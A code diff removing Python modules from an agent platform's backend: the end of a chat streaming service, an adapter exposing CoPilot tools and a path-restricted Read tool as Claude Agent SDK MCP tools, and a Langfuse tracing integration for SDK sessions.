||||||
),
|
|
||||||
tool_call_id=response.toolCallId,
|
|
||||||
)
|
|
||||||
)
|
|
||||||
has_tool_results = True
|
|
||||||
|
|
||||||
elif isinstance(response, StreamFinish):
|
|
||||||
stream_completed = True
|
|
||||||
|
|
||||||
if stream_completed:
|
|
||||||
break
|
|
||||||
|
|
||||||
if (
|
|
||||||
assistant_response.content or assistant_response.tool_calls
|
|
||||||
) and not has_appended_assistant:
|
|
||||||
session.messages.append(assistant_response)
|
|
||||||
|
|
||||||
except ImportError:
|
|
||||||
logger.warning(
|
|
||||||
"[SDK] claude-agent-sdk not available, using Anthropic fallback"
|
|
||||||
)
|
|
||||||
async for response in stream_with_anthropic(
|
|
||||||
session, system_prompt, text_block_id
|
|
||||||
):
|
|
||||||
if isinstance(response, StreamFinish):
|
|
||||||
stream_completed = True
|
|
||||||
yield response
|
|
||||||
|
|
||||||
await upsert_chat_session(session)
|
|
||||||
logger.debug(
|
|
||||||
f"[SDK] Session {session_id} saved with {len(session.messages)} messages"
|
|
||||||
)
|
|
||||||
if not stream_completed:
|
|
||||||
yield StreamFinish()
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
logger.error(f"[SDK] Error: {e}", exc_info=True)
|
|
||||||
try:
|
|
||||||
await upsert_chat_session(session)
|
|
||||||
except Exception as save_err:
|
|
||||||
logger.error(f"[SDK] Failed to save session on error: {save_err}")
|
|
||||||
yield StreamError(
|
|
||||||
errorText="An error occurred. Please try again.",
|
|
||||||
code="sdk_error",
|
|
||||||
)
|
|
||||||
yield StreamFinish()
|
|
||||||
finally:
|
|
||||||
_cleanup_sdk_tool_results(sdk_cwd)
|
|
||||||
|
|
||||||
|
|
||||||
async def _update_title_async(
|
|
||||||
session_id: str, message: str, user_id: str | None = None
|
|
||||||
) -> None:
|
|
||||||
"""Background task to update session title."""
|
|
||||||
try:
|
|
||||||
title = await _generate_session_title(
|
|
||||||
message, user_id=user_id, session_id=session_id
|
|
||||||
)
|
|
||||||
if title:
|
|
||||||
await update_session_title(session_id, title)
|
|
||||||
logger.debug(f"[SDK] Generated title for {session_id}: {title}")
|
|
||||||
except Exception as e:
|
|
||||||
logger.warning(f"[SDK] Failed to update session title: {e}")
|
|
||||||
@@ -1,321 +0,0 @@
|
|||||||
"""Tool adapter for wrapping existing CoPilot tools as Claude Agent SDK MCP tools.
|
|
||||||
|
|
||||||
This module provides the adapter layer that converts existing BaseTool implementations
|
|
||||||
into in-process MCP tools that can be used with the Claude Agent SDK.
|
|
||||||
"""
|
|
||||||
|
|
||||||
import json
|
|
||||||
import logging
|
|
||||||
import os
|
|
||||||
import uuid
|
|
||||||
from contextvars import ContextVar
|
|
||||||
from typing import Any
|
|
||||||
|
|
||||||
from backend.api.features.chat.model import ChatSession
|
|
||||||
from backend.api.features.chat.tools import TOOL_REGISTRY
|
|
||||||
from backend.api.features.chat.tools.base import BaseTool
|
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
|
||||||
|
|
||||||
# Allowed base directory for the Read tool (SDK saves oversized tool results here)
|
|
||||||
_SDK_TOOL_RESULTS_DIR = os.path.expanduser("~/.claude/")
|
|
||||||
|
|
||||||
# MCP server naming - the SDK prefixes tool names as "mcp__{server_name}__{tool}"
|
|
||||||
MCP_SERVER_NAME = "copilot"
|
|
||||||
MCP_TOOL_PREFIX = f"mcp__{MCP_SERVER_NAME}__"
|
|
||||||
|
|
||||||
# Context variables to pass user/session info to tool execution
|
|
||||||
_current_user_id: ContextVar[str | None] = ContextVar("current_user_id", default=None)
|
|
||||||
_current_session: ContextVar[ChatSession | None] = ContextVar(
|
|
||||||
"current_session", default=None
|
|
||||||
)
|
|
||||||
_current_tool_call_id: ContextVar[str | None] = ContextVar(
|
|
||||||
"current_tool_call_id", default=None
|
|
||||||
)
|
|
||||||
|
|
||||||
# Stash for MCP tool outputs before the SDK potentially truncates them.
|
|
||||||
# Keyed by tool_name → full output string. Consumed (popped) by the
|
|
||||||
# response adapter when it builds StreamToolOutputAvailable.
|
|
||||||
_pending_tool_outputs: ContextVar[dict[str, str]] = ContextVar(
|
|
||||||
"pending_tool_outputs", default=None # type: ignore[arg-type]
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
def set_execution_context(
|
|
||||||
user_id: str | None,
|
|
||||||
session: ChatSession,
|
|
||||||
tool_call_id: str | None = None,
|
|
||||||
) -> None:
|
|
||||||
"""Set the execution context for tool calls.
|
|
||||||
|
|
||||||
This must be called before streaming begins to ensure tools have access
|
|
||||||
to user_id and session information.
|
|
||||||
"""
|
|
||||||
_current_user_id.set(user_id)
|
|
||||||
_current_session.set(session)
|
|
||||||
_current_tool_call_id.set(tool_call_id)
|
|
||||||
_pending_tool_outputs.set({})
|
|
||||||
|
|
||||||
|
|
||||||
def get_execution_context() -> tuple[str | None, ChatSession | None, str | None]:
|
|
||||||
"""Get the current execution context."""
|
|
||||||
return (
|
|
||||||
_current_user_id.get(),
|
|
||||||
_current_session.get(),
|
|
||||||
_current_tool_call_id.get(),
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
def pop_pending_tool_output(tool_name: str) -> str | None:
|
|
||||||
"""Pop and return the stashed full output for *tool_name*.
|
|
||||||
|
|
||||||
The SDK CLI may truncate large tool results (writing them to disk and
|
|
||||||
replacing the content with a file reference). This stash keeps the
|
|
||||||
original MCP output so the response adapter can forward it to the
|
|
||||||
frontend for proper widget rendering.
|
|
||||||
|
|
||||||
Returns ``None`` if nothing was stashed for *tool_name*.
|
|
||||||
"""
|
|
||||||
pending = _pending_tool_outputs.get(None)
|
|
||||||
if pending is None:
|
|
||||||
return None
|
|
||||||
return pending.pop(tool_name, None)
|
|
||||||
|
|
||||||
|
|
||||||
def create_tool_handler(base_tool: BaseTool):
|
|
||||||
"""Create an async handler function for a BaseTool.
|
|
||||||
|
|
||||||
This wraps the existing BaseTool._execute method to be compatible
|
|
||||||
with the Claude Agent SDK MCP tool format.
|
|
||||||
"""
|
|
||||||
|
|
||||||
async def tool_handler(args: dict[str, Any]) -> dict[str, Any]:
|
|
||||||
"""Execute the wrapped tool and return MCP-formatted response."""
|
|
||||||
user_id, session, tool_call_id = get_execution_context()
|
|
||||||
|
|
||||||
if session is None:
|
|
||||||
return {
|
|
||||||
"content": [
|
|
||||||
{
|
|
||||||
"type": "text",
|
|
||||||
"text": json.dumps(
|
|
||||||
{
|
|
||||||
"error": "No session context available",
|
|
||||||
"type": "error",
|
|
||||||
}
|
|
||||||
),
|
|
||||||
}
|
|
||||||
],
|
|
||||||
"isError": True,
|
|
||||||
}
|
|
||||||
|
|
||||||
try:
|
|
||||||
# Call the existing tool's execute method
|
|
||||||
# Generate unique tool_call_id per invocation for proper correlation
|
|
||||||
effective_id = tool_call_id or f"sdk-{uuid.uuid4().hex[:12]}"
|
|
||||||
result = await base_tool.execute(
|
|
||||||
user_id=user_id,
|
|
||||||
session=session,
|
|
||||||
tool_call_id=effective_id,
|
|
||||||
**args,
|
|
||||||
)
|
|
||||||
|
|
||||||
# The result is a StreamToolOutputAvailable, extract the output
|
|
||||||
text = (
|
|
||||||
result.output
|
|
||||||
if isinstance(result.output, str)
|
|
||||||
else json.dumps(result.output)
|
|
||||||
)
|
|
||||||
|
|
||||||
# Stash the full output before the SDK potentially truncates it.
|
|
||||||
# The response adapter will pop this for frontend widget rendering.
|
|
||||||
pending = _pending_tool_outputs.get(None)
|
|
||||||
if pending is not None:
|
|
||||||
pending[base_tool.name] = text
|
|
||||||
|
|
||||||
return {
|
|
||||||
"content": [{"type": "text", "text": text}],
|
|
||||||
"isError": not result.success,
|
|
||||||
}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
logger.error(f"Error executing tool {base_tool.name}: {e}", exc_info=True)
|
|
||||||
return {
|
|
||||||
"content": [
|
|
||||||
{
|
|
||||||
"type": "text",
|
|
||||||
"text": json.dumps(
|
|
||||||
{
|
|
||||||
"error": str(e),
|
|
||||||
"type": "error",
|
|
||||||
"message": f"Failed to execute {base_tool.name}",
|
|
||||||
}
|
|
||||||
),
|
|
||||||
}
|
|
||||||
],
|
|
||||||
"isError": True,
|
|
||||||
}
|
|
||||||
|
|
||||||
return tool_handler
|
|
||||||
|
|
||||||
|
|
||||||
def _build_input_schema(base_tool: BaseTool) -> dict[str, Any]:
|
|
||||||
"""Build a JSON Schema input schema for a tool."""
|
|
||||||
return {
|
|
||||||
"type": "object",
|
|
||||||
"properties": base_tool.parameters.get("properties", {}),
|
|
||||||
"required": base_tool.parameters.get("required", []),
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
def get_tool_definitions() -> list[dict[str, Any]]:
|
|
||||||
"""Get all tool definitions in MCP format.
|
|
||||||
|
|
||||||
Returns a list of tool definitions that can be used with
|
|
||||||
create_sdk_mcp_server or as raw tool definitions.
|
|
||||||
"""
|
|
||||||
tool_definitions = []
|
|
||||||
|
|
||||||
for tool_name, base_tool in TOOL_REGISTRY.items():
|
|
||||||
tool_def = {
|
|
||||||
"name": tool_name,
|
|
||||||
"description": base_tool.description,
|
|
||||||
"inputSchema": _build_input_schema(base_tool),
|
|
||||||
}
|
|
||||||
tool_definitions.append(tool_def)
|
|
||||||
|
|
||||||
return tool_definitions
|
|
||||||
|
|
||||||
|
|
||||||
def get_tool_handlers() -> dict[str, Any]:
|
|
||||||
"""Get all tool handlers mapped by name.
|
|
||||||
|
|
||||||
Returns a dictionary mapping tool names to their handler functions.
|
|
||||||
"""
|
|
||||||
handlers = {}
|
|
||||||
|
|
||||||
for tool_name, base_tool in TOOL_REGISTRY.items():
|
|
||||||
handlers[tool_name] = create_tool_handler(base_tool)
|
|
||||||
|
|
||||||
return handlers
|
|
||||||
|
|
||||||
|
|
||||||
async def _read_file_handler(args: dict[str, Any]) -> dict[str, Any]:
|
|
||||||
"""Read a file with optional offset/limit. Restricted to SDK working directory.
|
|
||||||
|
|
||||||
After reading, the file is deleted to prevent accumulation in long-running pods.
|
|
||||||
"""
|
|
||||||
file_path = args.get("file_path", "")
|
|
||||||
offset = args.get("offset", 0)
|
|
||||||
limit = args.get("limit", 2000)
|
|
||||||
|
|
||||||
# Security: only allow reads under the SDK's working directory
|
|
||||||
real_path = os.path.realpath(file_path)
|
|
||||||
if not real_path.startswith(_SDK_TOOL_RESULTS_DIR):
|
|
||||||
return {
|
|
||||||
"content": [{"type": "text", "text": f"Access denied: {file_path}"}],
|
|
||||||
"isError": True,
|
|
||||||
}
|
|
||||||
|
|
||||||
try:
|
|
||||||
with open(real_path) as f:
|
|
||||||
lines = f.readlines()
|
|
||||||
selected = lines[offset : offset + limit]
|
|
||||||
content = "".join(selected)
|
|
||||||
return {"content": [{"type": "text", "text": content}], "isError": False}
|
|
||||||
except FileNotFoundError:
|
|
||||||
return {
|
|
||||||
"content": [{"type": "text", "text": f"File not found: {file_path}"}],
|
|
||||||
"isError": True,
|
|
||||||
}
|
|
||||||
except Exception as e:
|
|
||||||
return {
|
|
||||||
"content": [{"type": "text", "text": f"Error reading file: {e}"}],
|
|
||||||
"isError": True,
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
_READ_TOOL_NAME = "Read"
|
|
||||||
_READ_TOOL_DESCRIPTION = (
|
|
||||||
"Read a file from the local filesystem. "
|
|
||||||
"Use offset and limit to read specific line ranges for large files."
|
|
||||||
)
|
|
||||||
_READ_TOOL_SCHEMA = {
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"file_path": {
|
|
||||||
"type": "string",
|
|
||||||
"description": "The absolute path to the file to read",
|
|
||||||
},
|
|
||||||
"offset": {
|
|
||||||
"type": "integer",
|
|
||||||
"description": "Line number to start reading from (0-indexed). Default: 0",
|
|
||||||
},
|
|
||||||
"limit": {
|
|
||||||
"type": "integer",
|
|
||||||
"description": "Number of lines to read. Default: 2000",
|
|
||||||
},
|
|
||||||
},
|
|
||||||
"required": ["file_path"],
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
# Create the MCP server configuration
|
|
||||||
def create_copilot_mcp_server():
|
|
||||||
"""Create an in-process MCP server configuration for CoPilot tools.
|
|
||||||
|
|
||||||
This can be passed to ClaudeAgentOptions.mcp_servers.
|
|
||||||
|
|
||||||
Note: The actual SDK MCP server creation depends on the claude-agent-sdk
|
|
||||||
package being available. This function returns the configuration that
|
|
||||||
can be used with the SDK.
|
|
||||||
"""
|
|
||||||
try:
|
|
||||||
from claude_agent_sdk import create_sdk_mcp_server, tool
|
|
||||||
|
|
||||||
# Create decorated tool functions
|
|
||||||
sdk_tools = []
|
|
||||||
|
|
||||||
for tool_name, base_tool in TOOL_REGISTRY.items():
|
|
||||||
handler = create_tool_handler(base_tool)
|
|
||||||
decorated = tool(
|
|
||||||
tool_name,
|
|
||||||
base_tool.description,
|
|
||||||
_build_input_schema(base_tool),
|
|
||||||
)(handler)
|
|
||||||
sdk_tools.append(decorated)
|
|
||||||
|
|
||||||
# Add the Read tool so the SDK can read back oversized tool results
|
|
||||||
read_tool = tool(
|
|
||||||
_READ_TOOL_NAME,
|
|
||||||
_READ_TOOL_DESCRIPTION,
|
|
||||||
_READ_TOOL_SCHEMA,
|
|
||||||
)(_read_file_handler)
|
|
||||||
sdk_tools.append(read_tool)
|
|
||||||
|
|
||||||
server = create_sdk_mcp_server(
|
|
||||||
name=MCP_SERVER_NAME,
|
|
||||||
version="1.0.0",
|
|
||||||
tools=sdk_tools,
|
|
||||||
)
|
|
||||||
|
|
||||||
return server
|
|
||||||
|
|
||||||
except ImportError:
|
|
||||||
# Let ImportError propagate so service.py handles the fallback
|
|
||||||
raise
|
|
||||||
|
|
||||||
|
|
||||||
# SDK built-in tools allowed within the workspace directory.
|
|
||||||
# Security hooks validate that file paths stay within sdk_cwd
|
|
||||||
# and that Bash commands are restricted to a safe allowlist.
|
|
||||||
_SDK_BUILTIN_TOOLS = ["Read", "Write", "Edit", "Glob", "Grep", "Bash"]
|
|
||||||
|
|
||||||
# List of tool names for allowed_tools configuration
|
|
||||||
# Include MCP tools, the MCP Read tool for oversized results,
|
|
||||||
# and SDK built-in file tools for workspace operations.
|
|
||||||
COPILOT_TOOL_NAMES = [
|
|
||||||
*[f"{MCP_TOOL_PREFIX}{name}" for name in TOOL_REGISTRY.keys()],
|
|
||||||
f"{MCP_TOOL_PREFIX}{_READ_TOOL_NAME}",
|
|
||||||
*_SDK_BUILTIN_TOOLS,
|
|
||||||
]
|
|
||||||
@@ -1,426 +0,0 @@
|
|||||||
"""Langfuse tracing integration for Claude Agent SDK.
|
|
||||||
|
|
||||||
This module provides modular, non-invasive observability for SDK sessions.
|
|
||||||
All tracing is opt-in (only active when Langfuse credentials are configured)
|
|
||||||
and designed to not affect the core execution flow.
|
|
||||||
|
|
||||||
Usage:
|
|
||||||
async with TracedSession(session_id, user_id) as tracer:
|
|
||||||
# Your SDK code here
|
|
||||||
tracer.log_user_message(message)
|
|
||||||
async for sdk_msg in client.receive_messages():
|
|
||||||
tracer.log_sdk_message(sdk_msg)
|
|
||||||
tracer.log_result(result_message)
|
|
||||||
"""
|
|
||||||
|
|
||||||
from __future__ import annotations
|
|
||||||
|
|
||||||
import logging
|
|
||||||
import time
|
|
||||||
from contextlib import asynccontextmanager
|
|
||||||
from dataclasses import dataclass, field
|
|
||||||
from typing import TYPE_CHECKING, Any
|
|
||||||
|
|
||||||
from backend.util.settings import Settings
|
|
||||||
|
|
||||||
if TYPE_CHECKING:
|
|
||||||
from claude_agent_sdk import Message, ResultMessage
|
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
|
||||||
settings = Settings()
|
|
||||||
|
|
||||||
|
|
||||||
def _is_langfuse_configured() -> bool:
|
|
||||||
"""Check if Langfuse credentials are configured."""
|
|
||||||
return bool(
|
|
||||||
settings.secrets.langfuse_public_key and settings.secrets.langfuse_secret_key
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class ToolSpan:
|
|
||||||
"""Tracks a single tool call for tracing."""
|
|
||||||
|
|
||||||
tool_call_id: str
|
|
||||||
tool_name: str
|
|
||||||
input: dict[str, Any]
|
|
||||||
start_time: float = field(default_factory=time.perf_counter)
|
|
||||||
output: str | None = None
|
|
||||||
success: bool = True
|
|
||||||
end_time: float | None = None
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class GenerationSpan:
|
|
||||||
"""Tracks an LLM generation (text output) for tracing."""
|
|
||||||
|
|
||||||
text: str = ""
|
|
||||||
start_time: float = field(default_factory=time.perf_counter)
|
|
||||||
end_time: float | None = None
|
|
||||||
tool_calls: list[ToolSpan] = field(default_factory=list)
|
|
||||||
|
|
||||||
|
|
||||||
class TracedSession:
|
|
||||||
"""Context manager for tracing a Claude Agent SDK session with Langfuse.
|
|
||||||
|
|
||||||
Automatically creates a trace with:
|
|
||||||
- Session-level metadata (user_id, session_id)
|
|
||||||
- Generation spans for LLM outputs
|
|
||||||
- Tool call spans with input/output
|
|
||||||
- Token usage and cost (from ResultMessage)
|
|
||||||
|
|
||||||
If Langfuse is not configured, all methods are no-ops.
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(
|
|
||||||
self,
|
|
||||||
session_id: str,
|
|
||||||
user_id: str | None = None,
|
|
||||||
system_prompt: str | None = None,
|
|
||||||
):
|
|
||||||
self.session_id = session_id
|
|
||||||
self.user_id = user_id
|
|
||||||
self.system_prompt = system_prompt
|
|
||||||
self.enabled = _is_langfuse_configured()
|
|
||||||
|
|
||||||
# Internal state
|
|
||||||
self._trace: Any = None
|
|
||||||
self._langfuse: Any = None
|
|
||||||
self._user_message: str | None = None
|
|
||||||
self._generations: list[GenerationSpan] = []
|
|
||||||
self._current_generation: GenerationSpan | None = None
|
|
||||||
self._pending_tools: dict[str, ToolSpan] = {}
|
|
||||||
self._start_time: float = 0
|
|
||||||
|
|
||||||
async def __aenter__(self) -> TracedSession:
|
|
||||||
"""Start the trace."""
|
|
||||||
if not self.enabled:
|
|
||||||
return self
|
|
||||||
|
|
||||||
try:
|
|
||||||
from langfuse import get_client
|
|
||||||
|
|
||||||
self._langfuse = get_client()
|
|
||||||
self._start_time = time.perf_counter()
|
|
||||||
|
|
||||||
# Create the root trace
|
|
||||||
self._trace = self._langfuse.trace(
|
|
||||||
name="copilot-sdk-session",
|
|
||||||
session_id=self.session_id,
|
|
||||||
user_id=self.user_id,
|
|
||||||
metadata={
|
|
||||||
"sdk": "claude-agent-sdk",
|
|
||||||
"has_system_prompt": bool(self.system_prompt),
|
|
||||||
},
|
|
||||||
)
|
|
||||||
logger.debug(f"[Tracing] Started trace for session {self.session_id}")
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
logger.warning(f"[Tracing] Failed to start trace: {e}")
|
|
||||||
self.enabled = False
|
|
||||||
|
|
||||||
return self
|
|
||||||
|
|
||||||
async def __aexit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None:
|
|
||||||
"""End the trace and flush to Langfuse."""
|
|
||||||
if not self.enabled or not self._trace:
|
|
||||||
return
|
|
||||||
|
|
||||||
try:
|
|
||||||
# Finalize any open generation
|
|
||||||
self._finalize_current_generation()
|
|
||||||
|
|
||||||
# Add generations as spans
|
|
||||||
for gen in self._generations:
|
|
||||||
self._trace.span(
|
|
||||||
name="llm-generation",
|
|
||||||
start_time=gen.start_time,
|
|
||||||
end_time=gen.end_time or time.perf_counter(),
|
|
||||||
output=gen.text[:1000] if gen.text else None, # Truncate
|
|
||||||
metadata={"tool_calls": len(gen.tool_calls)},
|
|
||||||
)
|
|
||||||
|
|
||||||
# Add tool calls as nested spans
|
|
||||||
for tool in gen.tool_calls:
|
|
||||||
self._trace.span(
|
|
||||||
name=f"tool:{tool.tool_name}",
|
|
||||||
start_time=tool.start_time,
|
|
||||||
end_time=tool.end_time or time.perf_counter(),
|
|
||||||
input=tool.input,
|
|
||||||
output=tool.output[:500] if tool.output else None,
|
|
||||||
metadata={
|
|
||||||
"tool_call_id": tool.tool_call_id,
|
|
||||||
"success": tool.success,
|
|
||||||
},
|
|
||||||
)
|
|
||||||
|
|
||||||
# Update trace with final status
|
|
||||||
status = "error" if exc_type else "success"
|
|
||||||
self._trace.update(
|
|
||||||
output=self._generations[-1].text[:500] if self._generations else None,
|
|
||||||
metadata={"status": status, "num_generations": len(self._generations)},
|
|
||||||
)
|
|
||||||
|
|
||||||
# Flush asynchronously (Langfuse handles this in background)
|
|
||||||
logger.debug(
|
|
||||||
f"[Tracing] Completed trace for session {self.session_id}, "
|
|
||||||
f"{len(self._generations)} generations"
|
|
||||||
)
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
logger.warning(f"[Tracing] Failed to finalize trace: {e}")
|
|
||||||
|
|
||||||
def log_user_message(self, message: str) -> None:
|
|
||||||
"""Log the user's input message."""
|
|
||||||
if not self.enabled or not self._trace:
|
|
||||||
return
|
|
||||||
|
|
||||||
self._user_message = message
|
|
||||||
try:
|
|
||||||
self._trace.update(input=message[:1000])
|
|
||||||
except Exception as e:
|
|
||||||
logger.debug(f"[Tracing] Failed to log user message: {e}")
|
|
||||||
|
|
||||||
def log_sdk_message(self, sdk_message: Message) -> None:
|
|
||||||
"""Log an SDK message (automatically categorizes by type)."""
|
|
||||||
if not self.enabled:
|
|
||||||
return
|
|
||||||
|
|
||||||
try:
|
|
||||||
from claude_agent_sdk import (
|
|
||||||
AssistantMessage,
|
|
||||||
ResultMessage,
|
|
||||||
TextBlock,
|
|
||||||
ToolResultBlock,
|
|
||||||
ToolUseBlock,
|
|
||||||
UserMessage,
|
|
||||||
)
|
|
||||||
|
|
||||||
if isinstance(sdk_message, AssistantMessage):
|
|
||||||
# Start a new generation if needed
|
|
||||||
if self._current_generation is None:
|
|
||||||
self._current_generation = GenerationSpan()
|
|
||||||
self._generations.append(self._current_generation)
|
|
||||||
|
|
||||||
for block in sdk_message.content:
|
|
||||||
if isinstance(block, TextBlock) and block.text:
|
|
||||||
self._current_generation.text += block.text
|
|
||||||
|
|
||||||
elif isinstance(block, ToolUseBlock):
|
|
||||||
tool_span = ToolSpan(
|
|
||||||
tool_call_id=block.id,
|
|
||||||
tool_name=block.name,
|
|
||||||
input=block.input or {},
|
|
||||||
)
|
|
||||||
self._pending_tools[block.id] = tool_span
|
|
||||||
if self._current_generation:
|
|
||||||
self._current_generation.tool_calls.append(tool_span)
|
|
||||||
|
|
||||||
elif isinstance(sdk_message, UserMessage):
|
|
||||||
# UserMessage carries tool results
|
|
||||||
content = sdk_message.content
|
|
||||||
blocks = content if isinstance(content, list) else []
|
|
||||||
for block in blocks:
|
|
||||||
if isinstance(block, ToolResultBlock) and block.tool_use_id:
|
|
||||||
tool_span = self._pending_tools.get(block.tool_use_id)
|
|
||||||
if tool_span:
|
|
||||||
tool_span.end_time = time.perf_counter()
|
|
||||||
tool_span.success = not (block.is_error or False)
|
|
||||||
tool_span.output = self._extract_tool_output(block.content)
|
|
||||||
|
|
||||||
# After tool results, finalize current generation
|
|
||||||
# (SDK will start a new AssistantMessage for continuation)
|
|
||||||
self._finalize_current_generation()
|
|
||||||
|
|
||||||
elif isinstance(sdk_message, ResultMessage):
|
|
||||||
self._log_result(sdk_message)
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
logger.debug(f"[Tracing] Failed to log SDK message: {e}")
|
|
||||||
|
|
||||||
def _log_result(self, result: ResultMessage) -> None:
|
|
||||||
"""Log the final result with usage and cost."""
|
|
||||||
if not self.enabled or not self._trace:
|
|
||||||
return
|
|
||||||
|
|
||||||
try:
|
|
||||||
# Extract usage info
|
|
||||||
usage = result.usage or {}
|
|
||||||
metadata: dict[str, Any] = {
|
|
||||||
"duration_ms": result.duration_ms,
|
|
||||||
"duration_api_ms": result.duration_api_ms,
|
|
||||||
"num_turns": result.num_turns,
|
|
||||||
"is_error": result.is_error,
|
|
||||||
}
|
|
||||||
|
|
||||||
if result.total_cost_usd is not None:
|
|
||||||
metadata["cost_usd"] = result.total_cost_usd
|
|
||||||
|
|
||||||
if usage:
|
|
||||||
metadata["usage"] = usage
|
|
||||||
|
|
||||||
self._trace.update(metadata=metadata)
|
|
||||||
|
|
||||||
# Log as a generation for proper Langfuse cost/usage tracking
|
|
||||||
if usage or result.total_cost_usd:
|
|
||||||
self._trace.generation(
|
|
||||||
name="claude-sdk-completion",
|
|
||||||
model="claude-sonnet-4-20250514", # SDK default model
|
|
||||||
usage=(
|
|
||||||
{
|
|
||||||
"input": usage.get("input_tokens", 0),
|
|
||||||
"output": usage.get("output_tokens", 0),
|
|
||||||
"total": usage.get("input_tokens", 0)
|
|
||||||
+ usage.get("output_tokens", 0),
|
|
||||||
}
|
|
||||||
if usage
|
|
||||||
else None
|
|
||||||
),
|
|
||||||
metadata={"cost_usd": result.total_cost_usd},
|
|
||||||
)
|
|
||||||
|
|
||||||
logger.debug(
|
|
||||||
f"[Tracing] Logged result: {result.num_turns} turns, "
|
|
||||||
f"${result.total_cost_usd:.4f} cost"
|
|
||||||
if result.total_cost_usd
|
|
||||||
else f"[Tracing] Logged result: {result.num_turns} turns"
|
|
||||||
)
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
logger.debug(f"[Tracing] Failed to log result: {e}")
|
|
||||||
|
|
||||||
def _finalize_current_generation(self) -> None:
|
|
||||||
"""Mark the current generation as complete."""
|
|
||||||
if self._current_generation:
|
|
||||||
self._current_generation.end_time = time.perf_counter()
|
|
||||||
self._current_generation = None
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
|
|
||||||
"""Extract string output from tool result content."""
|
|
||||||
if isinstance(content, str):
|
|
||||||
return content
|
|
||||||
if isinstance(content, list):
|
|
||||||
parts = [
|
|
||||||
item.get("text", "") for item in content if item.get("type") == "text"
|
|
||||||
]
|
|
||||||
return "".join(parts) if parts else str(content)
|
|
||||||
return str(content) if content else ""
|
|
||||||
|
|
||||||
|
|
||||||
@asynccontextmanager
|
|
||||||
async def traced_session(
|
|
||||||
session_id: str,
|
|
||||||
user_id: str | None = None,
|
|
||||||
system_prompt: str | None = None,
|
|
||||||
):
|
|
||||||
"""Convenience async context manager for tracing SDK sessions.
|
|
||||||
|
|
||||||
Usage:
|
|
||||||
async with traced_session(session_id, user_id) as tracer:
|
|
||||||
tracer.log_user_message(message)
|
|
||||||
async for msg in client.receive_messages():
|
|
||||||
tracer.log_sdk_message(msg)
|
|
||||||
"""
|
|
||||||
tracer = TracedSession(session_id, user_id, system_prompt)
|
|
||||||
async with tracer:
|
|
||||||
yield tracer
|
|
||||||
|
|
||||||
|
|
||||||
def create_tracing_hooks(tracer: TracedSession) -> dict[str, Any]:
|
|
||||||
"""Create SDK hooks for fine-grained Langfuse tracing.
|
|
||||||
|
|
||||||
These hooks capture precise timing for tool executions and failures
|
|
||||||
that may not be visible in the message stream.
|
|
||||||
|
|
||||||
Designed to be merged with security hooks:
|
|
||||||
hooks = {**security_hooks, **create_tracing_hooks(tracer)}
|
|
||||||
|
|
||||||
Args:
|
|
||||||
tracer: The active TracedSession instance
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Hooks configuration dict for ClaudeAgentOptions
|
|
||||||
"""
|
|
||||||
if not tracer.enabled:
|
|
||||||
return {}
|
|
||||||
|
|
||||||
try:
|
|
||||||
from claude_agent_sdk import HookMatcher
|
|
||||||
from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
|
|
||||||
|
|
||||||
async def trace_pre_tool_use(
|
|
||||||
input_data: HookInput,
|
|
||||||
tool_use_id: str | None,
|
|
||||||
context: HookContext,
|
|
||||||
) -> SyncHookJSONOutput:
|
|
||||||
"""Record tool start time for accurate duration tracking."""
|
|
||||||
_ = context
|
|
||||||
if not tool_use_id:
|
|
||||||
return {}
|
|
||||||
tool_name = str(input_data.get("tool_name", "unknown"))
|
|
||||||
tool_input = input_data.get("tool_input", {})
|
|
||||||
|
|
||||||
# Record start time in pending tools
|
|
||||||
tracer._pending_tools[tool_use_id] = ToolSpan(
|
|
||||||
tool_call_id=tool_use_id,
|
|
||||||
tool_name=tool_name,
|
|
||||||
input=tool_input if isinstance(tool_input, dict) else {},
|
|
||||||
)
|
|
||||||
return {}
|
|
||||||
|
|
||||||
async def trace_post_tool_use(
|
|
||||||
input_data: HookInput,
|
|
||||||
tool_use_id: str | None,
|
|
||||||
context: HookContext,
|
|
||||||
) -> SyncHookJSONOutput:
|
|
||||||
"""Record tool completion for duration calculation."""
|
|
||||||
_ = context
|
|
||||||
if tool_use_id and tool_use_id in tracer._pending_tools:
|
|
||||||
tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
|
|
||||||
tracer._pending_tools[tool_use_id].success = True
|
|
||||||
return {}
|
|
||||||
|
|
||||||
async def trace_post_tool_failure(
|
|
||||||
input_data: HookInput,
|
|
||||||
tool_use_id: str | None,
|
|
||||||
context: HookContext,
|
|
||||||
) -> SyncHookJSONOutput:
|
|
||||||
"""Record tool failures for error tracking."""
|
|
||||||
_ = context
|
|
||||||
if tool_use_id and tool_use_id in tracer._pending_tools:
|
|
||||||
tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
|
|
||||||
tracer._pending_tools[tool_use_id].success = False
|
|
||||||
error = input_data.get("error", "Unknown error")
|
|
||||||
tracer._pending_tools[tool_use_id].output = f"ERROR: {error}"
|
|
||||||
return {}
|
|
||||||
|
|
||||||
return {
|
|
||||||
"PreToolUse": [HookMatcher(matcher="*", hooks=[trace_pre_tool_use])],
|
|
||||||
"PostToolUse": [HookMatcher(matcher="*", hooks=[trace_post_tool_use])],
|
|
||||||
"PostToolUseFailure": [
|
|
||||||
HookMatcher(matcher="*", hooks=[trace_post_tool_failure])
|
